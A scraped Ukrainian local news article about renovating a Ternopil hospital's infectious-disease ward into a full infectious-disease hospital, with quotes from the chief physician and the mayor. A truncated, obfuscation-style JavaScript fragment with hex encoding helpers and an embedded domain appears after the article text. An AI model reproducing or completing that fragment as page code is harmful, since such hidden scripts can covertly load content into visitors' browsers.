Ви знаходитесь: Головна / Новини / До Дня міста планують завершити ремонт інфекційного відділення

До Дня міста планують завершити ремонт інфекційного відділення

На базі інфекційного відділення лікарні швидкої допомоги, вже до Дня міста планують зробити інфекційну лікарню. Роботи відповідні розпочали ще в минулому році. Загалом вартість проекту складає близько семи з половиною мільйонів гривень.

До кінця літа в місті планують відкрити інфекційну лікарню. В минулому році встигли повністю відремонтувати другий, третій та четвертий поверхи колишнього інфекційного відділення. А також встановили ліфтову кабіну. Зараз тривають ремонтні роботи на першому поверсі. В планах ще зробити очисні споруди для медзакладу, а також провести зовнішні роботи по облицюванню та утепленню.

ЯРОСЛАВ ЧАЙКІВСЬКИЙ, головний лікар Тернопільської міської комунальної лікарні швидкої допомоги

«Залишаться роботи на першому поверсі і підвальні приміщення, які також будуть реконструйовані під встановлення очисної споруди, стерилізаційна і автоклав ми будемо ставити в підвальному приміщенні. Тобто, під це якраз йдуть підготовчі роботи».

Масштабний проект частково фінансує Фонд регіонального розвитку, частково кошти виділили з міського бюджету. Загалом, за словами Сергія Надала, проект обійдеться у сім з половиною мільйонів гривень. Буде в інфекційній лікарні і дитяче відділення.

СЕРГІЙ НАДАЛ, міський голова Тернополя

«Тепер там будуть облаштовані окремо спеціальні боксовані палати, як для дорослих, так і для дітей. Будуть зроблені необхідні приймальні відділення, як для дорослих, так і для дітей. Фактично, це вже буде майже повноцінна лікарня. Потрібно відмітити, що Тернопільська область – єдина, яка не має інфекційної лікарні. Такий об’єкт, лише в місті. Хоча сьогодні ми, по суті, за кошти міського бюджету обслуговуємо і лікуємо людей зі всієї області. Тому, що пацієнтами там є не лише тернополяни, але й мешканці всієї області. Тому, цей об’єкт є сьогодні важливий і потрібний не лише для міста».

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "intb.te.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top